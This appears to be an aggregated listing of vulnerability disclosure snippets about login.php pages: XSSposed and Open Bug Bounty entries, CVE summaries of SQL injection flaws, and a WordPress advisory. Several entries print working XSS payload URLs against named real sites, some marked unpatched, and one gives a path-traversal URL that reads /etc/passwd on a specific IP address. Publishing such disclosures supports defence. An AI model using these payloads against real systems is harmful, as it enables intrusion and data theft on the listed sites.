thewizard.com XSS vulnerability

Vulnerable URL: http://thewizard.com/wiznet/inner-login.php?errmsg=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 07.12.2015 Latest check for patch:| 07.12.2015 21:55 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa...

roer.se XSS vulnerability

Vulnerable URL: http://roer.se/login.php?ged="';--=index.php?ctype=gedcom=preview Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0 VIP...

schedule.mcairaviation.com XSS vulnerability

Vulnerable URL: http://schedule.mcairaviation.com/login.php?msg=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 25.07.2017 Latest check for patch:| 25.07.2017 21:46 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Ran...

subammarriage.com XSS vulnerability

Vulnerable URL: http://www.subammarriage.com/login.php?msg=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated...

myheritage.jp XSS vulnerability

Vulnerable URL: http://www.myheritage.jp/FP/Company/login.php?email=%27%22%3E%3E%3C/title%3E%27%22%3ESC%20RIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28/XSSPOSED/%29%3C/SCRIPT%3E Details: Description| Value ---|--- Patched:| Yes, at 25.07.2017 Latest check for patch:| 25.07.2017 18:47 GMT Vulnerability...

iGENUS 邮件系统 V5.0 任意文件读取漏洞

login.php 文件中，选择语言环境后会读取语言文件，并加载到页面，后台接到请求后，没有对 Lang 参数过滤，就直接读取文件，从而造成任意文件读取漏洞。 http://221.130.182.230/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg...

platorodiamante.com XSS vulnerability

Vulnerable URL: http://www.platorodiamante.com/login.php?Error= Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0 VIP website status:| No...

brannk.no XSS vulnerability

Vulnerable URL: https://www.brannk.no/views/frontpage/login.php?error= Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 3 VIP website status...

epure.be XSS vulnerability

Vulnerable URL: http://www.epure.be/pm/security/login.php?Message=@CAPINVALIDSESSION@=" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 15520340 Google Pagerank| 0 VIP website...

CVE-2015-4658

CVE-2015-4658 is described across multiple sources as a SQL injection vulnerability in the Milw0rm Clone Script 1.0. The affected component is the admin/login.php script, with input fields (1) usr and (2) pwd used to construct SQL queries, enabling remote attackers to execute arbitrary SQL comman...

vestmarket.ro XSS vulnerability

Open Bug Bounty ID: OBB-65877 Description| Value ---|--- Affected Website:| vestmarket.ro Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Cheat Shee...

CVE-2012-1665

Multiple SQL injection vulnerabilities in the admin panel in osCMax before 2.5.1 allow 1 remote attackers to execute arbitrary SQL commands via the username parameter in a process action to admin/login.php or 2 remote administrators to execute arbitrary SQL commands via the status parameter to...

CVE-2015-2679

Multiple SQL injection vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to execute arbitrary SQL commands via the 1 page parameter to index.php or 2 username parameter to gxadmin/login.php...

CVE-2014-10020

SQL injection vulnerability in login.php in Simple e-document 1.31 allows remote attackers to execute arbitrary SQL commands via the username parameter...

CVE-2014-10020

CVE-2014-10020 describes an SQL injection in login.php of Simple e-document 1.31, exploitable by remote attackers via the username parameter. The affected component is the login routine; the underlying cause is improper input handling allowing arbitrary SQL execution. The NVD data assigns a CVSS ...

CVE-2014-10020

SQL injection vulnerability in login.php in Simple e-document 1.31 allows remote attackers to execute arbitrary SQL commands via the username parameter...

CVE-2014-9519

SQL injection vulnerability in login.php in InfiniteWP Admin Panel before 2.4.3 allows remote attackers to execute arbitrary SQL commands via the email parameter...

Sql injection

SQL injection vulnerability in login.php in InfiniteWP Admin Panel before 2.4.3 allows remote attackers to execute arbitrary SQL commands via the email parameter...

FreeBSD : wordpress -- multiple vulnerabilities (5e135178-8aeb-11e4-801f-0022156e8794)

MITRE reports : wp-login.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 might allow remote attackers to reset passwords by leveraging access to an e-mail account that received a password-reset message. wp-includes/http.php in WordPress before 3.7.5,...

myinobas.de XSS vulnerability

Open Bug Bounty ID: OBB-53070 Description| Value ---|--- Affected Website:| myinobas.de Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Cheat Sheet...